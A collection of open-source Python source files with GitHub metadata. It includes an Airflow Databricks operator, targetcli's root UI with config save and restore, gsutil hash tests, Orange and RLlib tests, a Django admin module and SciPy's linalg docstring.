By default and in the common case this will be ``databricks_default``. To use
token based authentication, provide the key ``token`` in the extra field for the
connection and create the key ``host`` and leave the ``host`` field empty.
:type databricks_conn_id: str
:param polling_period_seconds: Controls the rate which we poll for the result of
this run. By default the operator will poll every 30 seconds.
:type polling_period_seconds: int
:param databricks_retry_limit: Amount of times retry if the Databricks backend is
unreachable. Its value must be greater than or equal to 1.
:type databricks_retry_limit: int
:param do_xcom_push: Whether we should push run_id and run_page_url to xcom.
:type do_xcom_push: bool
"""
# Used in airflow.models.BaseOperator
template_fields = ('json',)
# Databricks brand color (blue) under white text
ui_color = '#1CB1C2'
ui_fgcolor = '#fff'
def __init__(
self,
*,
job_id: Optional[str] = None,
json: Optional[Any] = None,
notebook_params: Optional[Dict[str, str]] = None,
python_params: Optional[List[str]] = None,
spark_submit_params: Optional[List[str]] = None,
databricks_conn_id: str = 'databricks_default',
polling_period_seconds: int = 30,
databricks_retry_limit: int = 3,
databricks_retry_delay: int = 1,
do_xcom_push: bool = False,
**kwargs,
) -> None:
"""Creates a new ``DatabricksRunNowOperator``."""
super().__init__(**kwargs)
self.json = json or {}
self.databricks_conn_id = databricks_conn_id
self.polling_period_seconds = polling_period_seconds
self.databricks_retry_limit = databricks_retry_limit
self.databricks_retry_delay = databricks_retry_delay
if job_id is not None:
self.json['job_id'] = job_id
if notebook_params is not None:
self.json['notebook_params'] = notebook_params
if python_params is not None:
self.json['python_params'] = python_params
if spark_submit_params is not None:
self.json['spark_submit_params'] = spark_submit_params
self.json = _deep_string_coerce(self.json)
# This variable will be used in case our task gets killed.
self.run_id = None
self.do_xcom_push = do_xcom_push
def _get_hook(self) -> DatabricksHook:
return DatabricksHook(
self.databricks_conn_id,
retry_limit=self.databricks_retry_limit,
retry_delay=self.databricks_retry_delay,
)
def execute(self, context):
hook = self._get_hook()
self.run_id = hook.run_now(self.json)
_handle_databricks_operator_execution(self, hook, self.log, context)
def on_kill(self):
hook = self._get_hook()
hook.cancel_run(self.run_id)
self.log.info('Task: %s with run_id: %s was requested to be cancelled.', self.task_id, self.run_id)
| {
"content_hash": "020673fb3dcdfe4849641c33c2584d64",
"timestamp": "",
"source": "github",
"line_count": 493,
"max_line_length": 107,
"avg_line_length": 43.36511156186612,
"alnum_prop": 0.6406286542869171,
"repo_name": "dhuang/incubator-airflow",
"id": "8956b43be1de76859fb3176980427221e7319d3c",
"size": "22170",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/providers/databricks/operators/databricks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109698"
},
{
"name": "HTML",
"bytes": "264851"
},
{
"name": "JavaScript",
"bytes": "1988427"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "3357958"
},
{
"name": "Shell",
"bytes": "34442"
}
],
"symlink_target": ""
} |
'''
Implements the targetcli root UI.
This file is part of targetcli.
Copyright (c) 2011-2013 by Datera, Inc
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
from datetime import datetime
from glob import glob
import os
import re
import shutil
import stat
import filecmp
import gzip
from configshell_fb import ExecutionError
from rtslib_fb import RTSRoot
from rtslib_fb.utils import ignored
from .ui_backstore import complete_path, UIBackstores
from .ui_node import UINode
from .ui_target import UIFabricModule
default_save_file = "/etc/target/saveconfig.json"
universal_prefs_file = "/etc/target/targetcli.conf"
class UIRoot(UINode):
'''
The targetcli hierarchy root node.
'''
def __init__(self, shell, as_root=False):
UINode.__init__(self, '/', shell=shell)
self.as_root = as_root
self.rtsroot = RTSRoot()
def refresh(self):
'''
Refreshes the tree of target fabric modules.
'''
self._children = set([])
# Invalidate any rtslib caches
if 'invalidate_caches' in dir(RTSRoot):
self.rtsroot.invalidate_caches()
UIBackstores(self)
# only show fabrics present in the system
for fm in self.rtsroot.fabric_modules:
if fm.wwns == None or any(fm.wwns):
UIFabricModule(fm, self)
def _compare_files(self, backupfile, savefile):
'''
Compare backfile and saveconfig file
'''
if (os.path.splitext(backupfile)[1] == '.gz'):
try:
with gzip.open(backupfile, 'rb') as fbkp:
fdata_bkp = fbkp.read()
except IOError as e:
self.shell.log.warning("Could not gzip open backupfile %s: %s"
% (backupfile, e.strerror))
else:
try:
with open(backupfile, 'rb') as fbkp:
fdata_bkp = fbkp.read()
except IOError as e:
self.shell.log.warning("Could not open backupfile %s: %s"
% (backupfile, e.strerror))
try:
with open(savefile, 'rb') as f:
fdata = f.read()
except IOError as e:
self.shell.log.warning("Could not open saveconfig file %s: %s"
% (savefile, e.strerror))
if fdata_bkp == fdata:
return True
else:
return False
def _create_dir(self, dirname):
'''
create directory with permissions 0o600 set
if directory already exists, set right perms
'''
mode = stat.S_IRUSR | stat.S_IWUSR # 0o600
if not os.path.exists(dirname):
umask = 0o777 ^ mode # Prevents always downgrading umask to 0
umask_original = os.umask(umask)
try:
os.makedirs(dirname, mode)
except OSError as exe:
raise ExecutionError("Cannot create directory [%s] %s."
% (dirname, exe.strerror))
finally:
os.umask(umask_original)
else:
if (os.stat(dirname).st_mode & 0o777) != mode:
os.chmod(dirname, mode)
def _save_backups(self, savefile):
'''
Take backup of config-file if needed.
'''
# Only save backups if saving to default location
if savefile != default_save_file:
return
backup_dir = os.path.dirname(savefile) + "/backup/"
backup_name = "saveconfig-" + \
datetime.now().strftime("%Y%m%d-%H:%M:%S") + "-json.gz"
backupfile = backup_dir + backup_name
backup_error = None
self._create_dir(backup_dir)
# Only save backups if savefile exits
if not os.path.exists(savefile):
return
backed_files_list = sorted(glob(os.path.dirname(savefile) + \
"/backup/saveconfig-*json*"))
# Save backup if backup dir is empty, or savefile is differnt from recent backup copy
if not backed_files_list or not self._compare_files(backed_files_list[-1], savefile):
mode = stat.S_IRUSR | stat.S_IWUSR # 0o600
umask = 0o777 ^ mode # Prevents always downgrading umask to 0
umask_original = os.umask(umask)
try:
with open(savefile, 'rb') as f_in, gzip.open(backupfile, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
f_out.flush()
except IOError as ioe:
backup_error = ioe.strerror or "Unknown error"
finally:
os.umask(umask_original)
if backup_error == None:
# remove excess backups
max_backup_files = int(self.shell.prefs['max_backup_files'])
try:
with open(universal_prefs_file) as prefs:
backups = [line for line in prefs.read().splitlines() if re.match('^max_backup_files\s*=', line)]
if max_backup_files < int(backups[0].split('=')[1].strip()):
max_backup_files = int(backups[0].split('=')[1].strip())
except:
self.shell.log.debug("No universal prefs file '%s'." % universal_prefs_file)
files_to_unlink = list(reversed(backed_files_list))[max_backup_files - 1:]
for f in files_to_unlink:
with ignored(IOError):
os.unlink(f)
self.shell.log.info("Last %d configs saved in %s."
% (max_backup_files, backup_dir))
else:
self.shell.log.warning("Could not create backup file %s: %s."
% (backupfile, backup_error))
def ui_command_saveconfig(self, savefile=default_save_file):
'''
Saves the current configuration to a file so that it can be restored
on next boot.
'''
self.assert_root()
if not savefile:
savefile = default_save_file
savefile = os.path.expanduser(savefile)
save_dir = os.path.dirname(savefile)
self._create_dir(save_dir)
self._save_backups(savefile)
self.rtsroot.save_to_file(savefile)
self.shell.log.info("Configuration saved to %s" % savefile)
def ui_command_restoreconfig(self, savefile=default_save_file, clear_existing=False,
target=None, storage_object=None):
'''
Restores configuration from a file.
'''
self.assert_root()
savefile = os.path.expanduser(savefile)
if not os.path.isfile(savefile):
self.shell.log.info("Restore file %s not found" % savefile)
return
target = self.ui_eval_param(target, 'string', None)
storage_object = self.ui_eval_param(storage_object, 'string', None)
errors = self.rtsroot.restore_from_file(savefile, clear_existing,
target, storage_object)
self.refresh()
if errors:
raise ExecutionError("Configuration restored, %d recoverable errors:\n%s" % \
(len(errors), "\n".join(errors)))
self.shell.log.info("Configuration restored from %s" % savefile)
def ui_complete_saveconfig(self, parameters, text, current_param):
'''
Auto-completes the file name
'''
if current_param != 'savefile':
return []
completions = complete_path(text, stat.S_ISREG)
if len(completions) == 1 and not completions[0].endswith('/'):
completions = [completions[0] + ' ']
return completions
ui_complete_restoreconfig = ui_complete_saveconfig
def ui_command_clearconfig(self, confirm=None):
'''
Removes entire configuration of backstores and targets
'''
self.assert_root()
confirm = self.ui_eval_param(confirm, 'bool', False)
self.rtsroot.clear_existing(confirm=confirm)
self.shell.log.info("All configuration cleared")
self.refresh()
def ui_command_version(self):
'''
Displays the targetcli and support libraries versions.
'''
from targetcli import __version__ as targetcli_version
self.shell.log.info("targetcli version %s" % targetcli_version)
def ui_command_sessions(self, action="list", sid=None):
'''
Displays a detailed list of all open sessions.
PARAMETERS
==========
action
------
The action is one of:
- `list`` gives a short session list
- `detail` gives a detailed list
sid
---
You can specify an "sid" to only list this one,
with or without details.
SEE ALSO
========
status
'''
indent_step = 4
base_steps = 0
action_list = ("list", "detail")
if action not in action_list:
raise ExecutionError("action must be one of: %s" %
", ".join(action_list))
if sid is not None:
try:
int(sid)
except ValueError:
raise ExecutionError("sid must be a number, '%s' given" % sid)
def indent_print(text, steps):
console = self.shell.con
console.display(console.indent(text, indent_step * steps),
no_lf=True)
def print_session(session):
acl = session['parent_nodeacl']
indent_print("alias: %(alias)s\tsid: %(id)i type: " \
"%(type)s session-state: %(state)s" % session,
base_steps)
if action == 'detail':
if self.as_root:
if acl.authenticate_target:
auth = " (authenticated)"
else:
auth = " (NOT AUTHENTICATED)"
else:
auth = ""
indent_print("name: %s%s" % (acl.node_wwn, auth),
base_steps + 1)
for mlun in acl.mapped_luns:
plugin = mlun.tpg_lun.storage_object.plugin
name = mlun.tpg_lun.storage_object.name
if mlun.write_protect:
mode = "r"
else:
mode = "rw"
indent_print("mapped-lun: %d backstore: %s/%s mode: %s" %
(mlun.mapped_lun, plugin, name, mode),
base_steps + 1)
for connection in session['connections']:
indent_print("address: %(address)s (%(transport)s) cid: " \
"%(cid)i connection-state: %(cstate)s" % \
connection, base_steps + 1)
if sid:
printed_sessions = [x for x in self.rtsroot.sessions if x['id'] == int(sid)]
else:
printed_sessions = list(self.rtsroot.sessions)
if len(printed_sessions):
for session in printed_sessions:
print_session(session)
else:
if sid is None:
indent_print("(no open sessions)", base_steps)
else:
raise ExecutionError("no session found with sid %i" % int(sid))
| {
"content_hash": "1db0797f4b30ed24cf7737293062a899",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 121,
"avg_line_length": 35.118840579710145,
"alnum_prop": 0.5332618025751072,
"repo_name": "agrover/targetcli-fb",
"id": "39e5ee99c342724df236646cfb42d7043c0008ae",
"size": "12116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "targetcli/ui_root.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Groff",
"bytes": "15840"
},
{
"name": "Makefile",
"bytes": "4583"
},
{
"name": "Python",
"bytes": "97525"
}
],
"symlink_target": ""
} |
"""Unit tests for hash command."""
import os
from gslib.exception import CommandException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.util import ObjectToURI as suri
_TEST_FILE_CONTENTS = '123456\n'
_TEST_FILE_B64_CRC = 'nYmSiA=='
_TEST_FILE_B64_MD5 = '9EeyCn/L9TpdW+AT6gsVrw=='
_TEST_FILE_HEX_CRC = '9D899288'
_TEST_FILE_HEX_MD5 = 'f447b20a7fcbf53a5d5be013ea0b15af'
_TEST_COMPOSITE_ADDED_CONTENTS = 'tmp'
_TEST_COMPOSITE_B64_CRC = 'M3DYBg=='
_TEST_COMPOSITE_HEX_CRC = '3370D806'
class TestHashUnit(testcase.GsUtilUnitTestCase):
"""Unit tests for hash command."""
def testHashContents(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout = self.RunCommand('hash', args=[tmp_file], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
def testHashNoMatch(self):
try:
self.RunCommand('hash', args=['non-existent-file'])
self.fail('Did not get expected CommandException')
except CommandException, e:
self.assertIn('No files matched', e.reason)
def testHashHexFormat(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout = self.RunCommand('hash', args=['-h', tmp_file], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_HEX_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_HEX_MD5, stdout)
def testHashWildcard(self):
num_test_files = 2
tmp_dir = self.CreateTempDir(test_files=num_test_files)
stdout = self.RunCommand('hash', args=[os.path.join(tmp_dir, '*')],
return_stdout=True)
# One summary line and two hash lines per file.
num_expected_lines = num_test_files * (1 + 2)
self.assertEquals(len(stdout.splitlines()), num_expected_lines)
def testHashSelectAlg(self):
tmp_file = self.CreateTempFile(contents=_TEST_FILE_CONTENTS)
stdout_crc = self.RunCommand('hash', args=['-c', tmp_file],
return_stdout=True)
stdout_md5 = self.RunCommand('hash', args=['-m', tmp_file],
return_stdout=True)
stdout_both = self.RunCommand('hash', args=['-c', '-m', tmp_file],
return_stdout=True)
for stdout in (stdout_crc, stdout_both):
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
for stdout in (stdout_md5, stdout_both):
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
self.assertNotIn('md5', stdout_crc)
self.assertNotIn('crc32c', stdout_md5)
class TestHash(testcase.GsUtilIntegrationTestCase):
"""Integration tests for hash command."""
def testHashCloudObject(self):
"""Test hash command on a cloud object."""
obj1 = self.CreateObject(object_name='obj1', contents=_TEST_FILE_CONTENTS)
# Tests cloud object with -h.
stdout = self.RunGsUtil(['hash', '-h', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
if self.default_provider == 'gs':
# Hex hashes for cloud objects get converted to lowercase but their
# meaning is the same.
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_HEX_CRC.lower(),
stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_HEX_MD5, stdout)
# Tests cloud object as base64.
stdout = self.RunGsUtil(['hash', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
if self.default_provider == 'gs':
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_FILE_B64_CRC, stdout)
self.assertIn('\tHash (md5):\t\t%s' % _TEST_FILE_B64_MD5, stdout)
@SkipForS3('No composite object or crc32c support for S3.')
def testHashCompositeObject(self):
"""Test hash command on a composite object (which only has crc32c)."""
bucket = self.CreateBucket()
obj1 = self.CreateObject(bucket_uri=bucket, object_name='obj1',
contents=_TEST_FILE_CONTENTS)
obj2 = self.CreateObject(bucket_uri=bucket, object_name='tmp',
contents=_TEST_COMPOSITE_ADDED_CONTENTS)
self.RunGsUtil(['compose', suri(obj1), suri(obj2), suri(obj1)])
stdout = self.RunGsUtil(['hash', '-h', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [hex]', stdout)
# Hex hashes for cloud objects get converted to lowercase but their
# meaning is the same.
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_COMPOSITE_HEX_CRC.lower(),
stdout)
stdout = self.RunGsUtil(['hash', suri(obj1)], return_stdout=True)
self.assertIn('Hashes [base64]', stdout)
self.assertIn('\tHash (crc32c):\t\t%s' % _TEST_COMPOSITE_B64_CRC, stdout)
| {
"content_hash": "c5b5ded1c52d55e06b62c001a700c28d",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 79,
"avg_line_length": 43.38053097345133,
"alnum_prop": 0.653406772745818,
"repo_name": "fishjord/gsutil",
"id": "c166c34eec4190c70316fd7f89e22facb2b77c8b",
"size": "5522",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "gslib/tests/test_hash.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2944776"
}
],
"symlink_target": ""
} |
class Formatter:
def __init__(self, key_points,fmt):
if not hasattr(self, fmt):
raise ValueError("invalid option: use 'md', 'json' or 'html'")
self._fmt = fmt
self._kp = key_points
self._options = {
'default': self.default,
'md' : self.md,
'json': self.json,
'html':self.html,
}
def frmt(self):
return self._options[self._fmt]()
def default(self):
return self._kp
def md(self):
fs = u""
for i in xrange(len(self._kp)):
fs += ">* {{{}}}\n".format(i)
return fs.format(*self._kp)
def json(self):
raise NotImplementedError
def html(self):
raise NotImplementedError
| {
"content_hash": "7215b596b1fc88509e05bf5bfd1aaded",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 74,
"avg_line_length": 25.151515151515152,
"alnum_prop": 0.4566265060240964,
"repo_name": "lekhakpadmanabh/Summarizer",
"id": "f99e8e272561f5eb8f7a8e52004be11e985193fe",
"size": "830",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "smrzr/formatters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9993"
}
],
"symlink_target": ""
} |
import math
import time
from AnyQt.QtGui import QColor
from AnyQt.QtCore import Qt, QRectF, QLineF
from ..annotationitem import TextAnnotation, ArrowAnnotation, ArrowItem
from . import TestItems
class TestAnnotationItem(TestItems):
def test_textannotation(self):
text = "Annotation"
annot = TextAnnotation()
annot.setPlainText(text)
self.assertEqual(annot.toPlainText(), text)
annot2 = TextAnnotation()
self.assertEqual(annot2.toPlainText(), "")
text = "This is an annotation"
annot2.setPlainText(text)
self.assertEqual(annot2.toPlainText(), text)
annot2.setDefaultTextColor(Qt.red)
control_rect = QRectF(0, 0, 100, 200)
annot2.setGeometry(control_rect)
self.assertEqual(annot2.geometry(), control_rect)
annot.setTextInteractionFlags(Qt.TextEditorInteraction)
annot.setPos(400, 100)
annot.adjustSize()
annot._TextAnnotation__textItem.setFocus()
self.scene.addItem(annot)
self.scene.addItem(annot2)
self.app.exec_()
def test_arrowannotation(self):
item = ArrowItem()
self.scene.addItem(item)
item.setLine(QLineF(100, 100, 100, 200))
item.setLineWidth(5)
item = ArrowItem()
item.setLine(QLineF(150, 100, 150, 200))
item.setLineWidth(10)
item.setArrowStyle(ArrowItem.Concave)
self.scene.addItem(item)
item = ArrowAnnotation()
item.setPos(10, 10)
item.setLine(QLineF(10, 10, 200, 200))
self.scene.addItem(item)
item.setLineWidth(5)
def advance():
clock = time.clock() * 10
item.setLineWidth(5 + math.sin(clock) * 5)
item.setColor(QColor(Qt.red).lighter(100 + 30 * math.cos(clock)))
self.singleShot(0, advance)
advance()
self.app.exec_()
| {
"content_hash": "df9e7893e62008817be8fda704882868",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 77,
"avg_line_length": 28.388059701492537,
"alnum_prop": 0.6272344900105152,
"repo_name": "cheral/orange3",
"id": "ec77bef642ed216f41ce5881a2ee31e495c2e83b",
"size": "1902",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Orange/canvas/canvas/items/tests/test_annotationitem.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12023"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20217"
},
{
"name": "Python",
"bytes": "4139574"
},
{
"name": "Shell",
"bytes": "47441"
}
],
"symlink_target": ""
} |
import unittest
import ray
import ray.rllib.agents.impala as impala
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import check_compute_single_action, \
framework_iterator
tf1, tf, tfv = try_import_tf()
class TestIMPALA(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
ray.init()
@classmethod
def tearDownClass(cls) -> None:
ray.shutdown()
def test_impala_compilation(self):
"""Test whether an ImpalaTrainer can be built with both frameworks."""
config = impala.DEFAULT_CONFIG.copy()
num_iterations = 1
for _ in framework_iterator(config):
local_cfg = config.copy()
for env in ["Pendulum-v0", "CartPole-v0"]:
print("Env={}".format(env))
print("w/o LSTM")
# Test w/o LSTM.
local_cfg["model"]["use_lstm"] = False
local_cfg["num_aggregation_workers"] = 0
trainer = impala.ImpalaTrainer(config=local_cfg, env=env)
for i in range(num_iterations):
print(trainer.train())
check_compute_single_action(trainer)
trainer.stop()
# Test w/ LSTM.
print("w/ LSTM")
local_cfg["model"]["use_lstm"] = True
local_cfg["model"]["lstm_use_prev_action"] = True
local_cfg["model"]["lstm_use_prev_reward"] = True
local_cfg["num_aggregation_workers"] = 2
trainer = impala.ImpalaTrainer(config=local_cfg, env=env)
for i in range(num_iterations):
print(trainer.train())
check_compute_single_action(
trainer,
include_state=True,
include_prev_action_reward=True)
trainer.stop()
def test_impala_lr_schedule(self):
config = impala.DEFAULT_CONFIG.copy()
config["lr_schedule"] = [
[0, 0.0005],
[10000, 0.000001],
]
local_cfg = config.copy()
trainer = impala.ImpalaTrainer(config=local_cfg, env="CartPole-v0")
def get_lr(result):
return result["info"]["learner"]["default_policy"]["cur_lr"]
try:
r1 = trainer.train()
r2 = trainer.train()
assert get_lr(r2) < get_lr(r1), (r1, r2)
finally:
trainer.stop()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| {
"content_hash": "1c3792eafa8dcfbe0c738791b665c4ab",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 78,
"avg_line_length": 33.166666666666664,
"alnum_prop": 0.534209509083881,
"repo_name": "richardliaw/ray",
"id": "a9697c50bb096e564d85c7e2e97b4930bf8da6f5",
"size": "2587",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rllib/agents/impala/tests/test_impala.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "62178"
},
{
"name": "C++",
"bytes": "4258483"
},
{
"name": "CSS",
"bytes": "8025"
},
{
"name": "Dockerfile",
"bytes": "6292"
},
{
"name": "HTML",
"bytes": "30414"
},
{
"name": "Java",
"bytes": "1263157"
},
{
"name": "JavaScript",
"bytes": "444"
},
{
"name": "Jupyter Notebook",
"bytes": "1615"
},
{
"name": "Makefile",
"bytes": "234"
},
{
"name": "Python",
"bytes": "7515224"
},
{
"name": "Shell",
"bytes": "117425"
},
{
"name": "Starlark",
"bytes": "200955"
},
{
"name": "TypeScript",
"bytes": "149068"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import SocialAccount, SocialToken
class SocialAccountAdmin(admin.ModelAdmin):
search_fields = ('user__username', )
raw_id_fields = ('user',)
list_display = ('user', 'uid', 'provider')
list_filter = ('provider',)
class SocialTokenAdmin(admin.ModelAdmin):
raw_id_fields = ( 'account',)
list_display = ( 'account', 'truncated_token', 'expires_at', 'token_secret')
list_filter = ('expires_at',)
def truncated_token(self, token):
max_chars = 40
ret = token.token
if len(ret) > max_chars:
ret = ret[0:max_chars] + '...(truncated)'
return ret
truncated_token.short_description = 'Token'
admin.site.register(SocialToken, SocialTokenAdmin)
admin.site.register(SocialAccount, SocialAccountAdmin)
| {
"content_hash": "580b2168cecf732635c0855c0508c59b",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 80,
"avg_line_length": 31.46153846153846,
"alnum_prop": 0.6589242053789731,
"repo_name": "houssemFat/bloodOn",
"id": "ffcf0eaffba3f63d1714bb1b22de55fcfa793ed0",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bloodon/accounts/social/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19573"
},
{
"name": "HTML",
"bytes": "88555"
},
{
"name": "JavaScript",
"bytes": "235084"
},
{
"name": "Python",
"bytes": "191595"
}
],
"symlink_target": ""
} |
"""
====================================
Linear algebra (:mod:`scipy.linalg`)
====================================
.. currentmodule:: scipy.linalg
Linear algebra functions.
.. seealso::
`numpy.linalg` for more linear algebra functions. Note that
although `scipy.linalg` imports most of them, identically named
functions from `scipy.linalg` may offer more or slightly differing
functionality.
Basics
======
.. autosummary::
:toctree: generated/
inv - Find the inverse of a square matrix
solve - Solve a linear system of equations
solve_banded - Solve a banded linear system
solveh_banded - Solve a Hermitian or symmetric banded system
solve_circulant - Solve a circulant system
solve_triangular - Solve a triangular matrix
solve_toeplitz - Solve a toeplitz matrix
det - Find the determinant of a square matrix
norm - Matrix and vector norm
lstsq - Solve a linear least-squares problem
pinv - Pseudo-inverse (Moore-Penrose) using lstsq
pinv2 - Pseudo-inverse using svd
pinvh - Pseudo-inverse of hermitian matrix
kron - Kronecker product of two arrays
tril - Construct a lower-triangular matrix from a given matrix
triu - Construct an upper-triangular matrix from a given matrix
orthogonal_procrustes - Solve an orthogonal Procrustes problem
matrix_balance - Balance matrix entries with a similarity transformation
LinAlgError
Eigenvalue Problems
===================
.. autosummary::
:toctree: generated/
eig - Find the eigenvalues and eigenvectors of a square matrix
eigvals - Find just the eigenvalues of a square matrix
eigh - Find the e-vals and e-vectors of a Hermitian or symmetric matrix
eigvalsh - Find just the eigenvalues of a Hermitian or symmetric matrix
eig_banded - Find the eigenvalues and eigenvectors of a banded matrix
eigvals_banded - Find just the eigenvalues of a banded matrix
Decompositions
==============
.. autosummary::
:toctree: generated/
lu - LU decomposition of a matrix
lu_factor - LU decomposition returning unordered matrix and pivots
lu_solve - Solve Ax=b using back substitution with output of lu_factor
svd - Singular value decomposition of a matrix
svdvals - Singular values of a matrix
diagsvd - Construct matrix of singular values from output of svd
orth - Construct orthonormal basis for the range of A using svd
cholesky - Cholesky decomposition of a matrix
cholesky_banded - Cholesky decomp. of a sym. or Hermitian banded matrix
cho_factor - Cholesky decomposition for use in solving a linear system
cho_solve - Solve previously factored linear system
cho_solve_banded - Solve previously factored banded linear system
polar - Compute the polar decomposition.
qr - QR decomposition of a matrix
qr_multiply - QR decomposition and multiplication by Q
qr_update - Rank k QR update
qr_delete - QR downdate on row or column deletion
qr_insert - QR update on row or column insertion
rq - RQ decomposition of a matrix
qz - QZ decomposition of a pair of matrices
ordqz - QZ decomposition of a pair of matrices with reordering
schur - Schur decomposition of a matrix
rsf2csf - Real to complex Schur form
hessenberg - Hessenberg form of a matrix
.. seealso::
`scipy.linalg.interpolative` -- Interpolative matrix decompositions
Matrix Functions
================
.. autosummary::
:toctree: generated/
expm - Matrix exponential
logm - Matrix logarithm
cosm - Matrix cosine
sinm - Matrix sine
tanm - Matrix tangent
coshm - Matrix hyperbolic cosine
sinhm - Matrix hyperbolic sine
tanhm - Matrix hyperbolic tangent
signm - Matrix sign
sqrtm - Matrix square root
funm - Evaluating an arbitrary matrix function
expm_frechet - Frechet derivative of the matrix exponential
expm_cond - Relative condition number of expm in the Frobenius norm
fractional_matrix_power - Fractional matrix power
Matrix Equation Solvers
=======================
.. autosummary::
:toctree: generated/
solve_sylvester - Solve the Sylvester matrix equation
solve_continuous_are - Solve the continuous-time algebraic Riccati equation
solve_discrete_are - Solve the discrete-time algebraic Riccati equation
solve_continuous_lyapunov - Solve the continous-time Lyapunov equation
solve_discrete_lyapunov - Solve the discrete-time Lyapunov equation
Special Matrices
================
.. autosummary::
:toctree: generated/
block_diag - Construct a block diagonal matrix from submatrices
circulant - Circulant matrix
companion - Companion matrix
dft - Discrete Fourier transform matrix
hadamard - Hadamard matrix of order 2**n
hankel - Hankel matrix
helmert - Helmert matrix
hilbert - Hilbert matrix
invhilbert - Inverse Hilbert matrix
leslie - Leslie matrix
pascal - Pascal matrix
invpascal - Inverse Pascal matrix
toeplitz - Toeplitz matrix
tri - Construct a matrix filled with ones at and below a given diagonal
Low-level routines
==================
.. autosummary::
:toctree: generated/
get_blas_funcs
get_lapack_funcs
find_best_blas_type
.. seealso::
`scipy.linalg.blas` -- Low-level BLAS functions
`scipy.linalg.lapack` -- Low-level LAPACK functions
`scipy.linalg.cython_blas` -- Low-level BLAS functions for Cython
`scipy.linalg.cython_lapack` -- Low-level LAPACK functions for Cython
"""
from __future__ import division, print_function, absolute_import
from .linalg_version import linalg_version as __version__
from .misc import *
from .basic import *
from .decomp import *
from .decomp_lu import *
from .decomp_cholesky import *
from .decomp_qr import *
from ._decomp_qz import *
from .decomp_svd import *
from .decomp_schur import *
from ._decomp_polar import *
from .matfuncs import *
from .blas import *
from .lapack import *
from .special_matrices import *
from ._solvers import *
from ._procrustes import *
from ._decomp_update import *
__all__ = [s for s in dir() if not s.startswith('_')]
from numpy.dual import register_func
for k in ['norm', 'inv', 'svd', 'solve', 'det', 'eig', 'eigh', 'eigvals',
'eigvalsh', 'lstsq', 'cholesky']:
try:
register_func(k, eval(k))
except ValueError:
pass
try:
register_func('pinv', pinv2)
except ValueError:
pass
del k, register_func
from numpy.testing import Tester
test = Tester().test
| {
"content_hash": "8c3fce868892fdc2c39afb92ee85dc3a",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 78,
"avg_line_length": 30.393364928909953,
"alnum_prop": 0.7140184001247466,
"repo_name": "befelix/scipy",
"id": "35d2505d0c46c7cd6e260c106b62c8cde860e03c",
"size": "6413",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "scipy/linalg/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4126152"
},
{
"name": "C++",
"bytes": "507246"
},
{
"name": "Fortran",
"bytes": "5572451"
},
{
"name": "Makefile",
"bytes": "778"
},
{
